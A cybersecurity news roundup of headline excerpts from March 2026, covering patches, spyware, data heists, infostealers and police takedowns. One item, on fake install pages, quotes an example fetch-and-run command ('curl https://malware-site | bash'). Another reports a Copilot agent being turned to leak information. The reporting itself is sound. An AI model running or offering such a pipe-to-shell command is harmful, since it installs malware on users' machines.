- Critical Microsoft Excel bug weaponizes Copilot Agent for zero-click information disclosure attack
March 10, 2026
After a whopper of a Patch Tuesday last month, with six Microsoft flaws exploited as zero-days, March didn’t exactly roar in like a lion. Just two of the 83 Microsoft CVEs released on Tuesday are listed as publicly known, and none is under active exploitation, which we’re sure is a welcome change to sysadmins. Another eight ...
- US military contractor likely built iPhone hacking tools used by Russian spies in Ukraine
March 10, 2026
A mass hacking campaign targeting iPhone users in Ukraine and China used tools that were likely designed by U.S. military contractor L3Harris, TechCrunch has learned. The tools, which were intended for Western spies, wound up in the hands of various hacking groups, including Russian government spooks and Chinese cybercriminals. Last week, Google revealed that over the ...
- Polish cops bust alleged teen DDoS kit sellers – youngest just 12
March 10, 2026
Polish police have referred seven suspected juvenile cybercriminals to family court over an alleged scheme to flog DDoS kits online. The youths, aged between 12 and 16 at the time of the alleged offenses, all face charges related to selling DDoS tools in what police described as a purely profit-driven scheme. Poland’s Central Bureau for Combating ...
- Patch Tuesday – March 2026
March 10, 2026
Microsoft is publishing 77 vulnerabilities this March 2026 Patch Tuesday. Microsoft is aware of public disclosure of two of today’s vulnerabilities, but without evidence of exploitation in the wild for any (yet), so there are no Microsoft additions to CISA KEV today. Earlier in the month, Microsoft provided patches to address nine browser vulnerabilities, which are ...
- Salt Typhoon is hacking the world’s phone and internet giants
March 9, 2026
Salt Typhoon is behind one of the broadest hacking campaigns in recent years, targeting some of the world’s largest phone and internet companies and stealing tens of millions of phone records about senior government officials. The hacking group, attributed to China, is part of a wider cluster of hackers with the collective aim of helping China ...
- ShinyHunters claims more high-profile victims in latest Salesforce customers data heist
March 9, 2026
ShinyHunters told The Register that it has stolen data from about 100 high-profile companies in its latest Salesforce customer data heist, including Salesforce itself. “Have stolen data from almost 400 websites and about 100 essential high profile companies Snowflake, Okta, Lastpass, Salesforce itself, Sony, AMD, and a lot more,” a ShinyHunters spokesperson told us, adding ...
- Fake Claude Code install pages hit Windows and Mac users with infostealers
March 9, 2026
Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter. That habit turns the ...
- Russian cybercrims phish their way into officials’ Signal and WhatsApp accounts
March 9, 2026
Russian-linked hackers are trying to break into the Signal and WhatsApp accounts of government officials, journalists, and military personnel globally – not by cracking encryption, but by simply tricking people into handing over the keys. That’s the warning issued Monday by the Netherlands’ intelligence and military security agencies, the AIVD and MIVD, which say a “large-scale” ...
- Cisco warns of two more SD-WAN bugs under active attack
March 6, 2026
Just when network admins thought the Cisco SD-WAN patch queue might finally be shrinking, Switchzilla has confirmed miscreants are exploiting more vulnerabilities in its SD-WAN management software. The newly abused flaws affect Cisco Catalyst SD-WAN Manager, the platform formerly known as vManage that sits at the center of many organizations’ SD-WAN deployments. One of the bugs, ...
- Securing ambient AI in healthcare: governance is the new front line
March 5, 2026
Ambient AI is no longer experimental. It’s live. From AI-powered clinical documentation assistants to remote monitoring systems and intelligent patient engagement agents, healthcare organizations are embedding AI directly into care delivery. The promise is compelling: less administrative burden, faster insights, and more time with patients. But as AI enters clinical workflows, a more urgent question emerges: ...
- New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages
March 5, 2026
Trend Micro researchers recently found the existence of a new stealer binary that collects browser and cryptocurrency wallet data, system information, and common files, among others. The researchers designated this new stealer BoryptGrab. Certain variants of the stealer can download a PyInstaller backdoor, which Trend Micro refer to as TunnesshClient. TunnesshClient establishes a reverse Secure Shell ...
- Microsoft warns of new signed malware which deploys remote monitoring tools as backdoors
March 5, 2026
Microsoft is warning of a new phishing campaign which aims to deploy persistent backdoors to victim’s computers. In a new in-depth analysis, the company’s researchers said they recently spotted multiple phishing campaigns, currently not attributed to any known threat actors, which send out emails with weaponized PDF files (financial documents, invoices), fake meeting invitations, or organizational ...
- Taiwan Indicts 62 Over Laundering $339M From Crypto Scam Compounds in Cambodia
March 4, 2026
Taiwanese prosecutors have indicted 62 people over their alleged links to Prince Group, a network designated as a transnational criminal organization by the U.S. Department of Justice. According to a report by Reuters, those indicted include the group’s chairman and alleged mastermind Chen Zhi, who was arrested in Cambodia and extradited to China earlier this year.Thirteen ...
- ‘Hundreds’ of Iranian hacking attempts have hit surveillance cameras since the missile strikes
March 4, 2026
Multiple Iranian hacking crews have been targeting internet-connected surveillance cameras across Israel and other Middle Eastern countries since the war started on February 28, according to Check Point security researchers. The Tel Aviv-based security shop has tracked “hundreds” of attempts to exploit a handful of bugs in IP cameras made by two manufacturers, Hikvision and Dahua, ...
- Kaspersky dismisses claims Coruna iPhone exploit kit is connected to NSA-linked operation
March 4, 2026
Russian cybersecurity outfit Kaspersky is waving away claims that an iPhone exploit kit recently uncovered by Google was developed by the same people who were behind a group of zero-days that allegedly compromised thousands of Russian diplomats in a 2023 campaign. After Google’s Threat Intelligence Group (GTIG) published its findings on the Coruna exploit kit this ...
- Major data leak forum dismantled in global action against cybercrime forum
March 4, 2026
A major online forum for stolen data has been dismantled following an international operation coordinated by Europol. The forum, known as LeakBase, had established itself as a central hub in the cybercrime ecosystem, specialising in the trade of leaked databases and so-called “stealer logs” – archives of stolen credentials harvested through infostealer malware. Accessible on the ...
- CIMB refutes claims of data breach involving 1.2 million records
March 4, 2026
CIMB Group Holdings Bhd has given assurance that claims circulating online about a data breach involving its customers are false and that customer data continues to be protected. The financial services provider said on social media platform X that its security teams have verified that all systems are secure and that customer data remains fully safeguarded. ...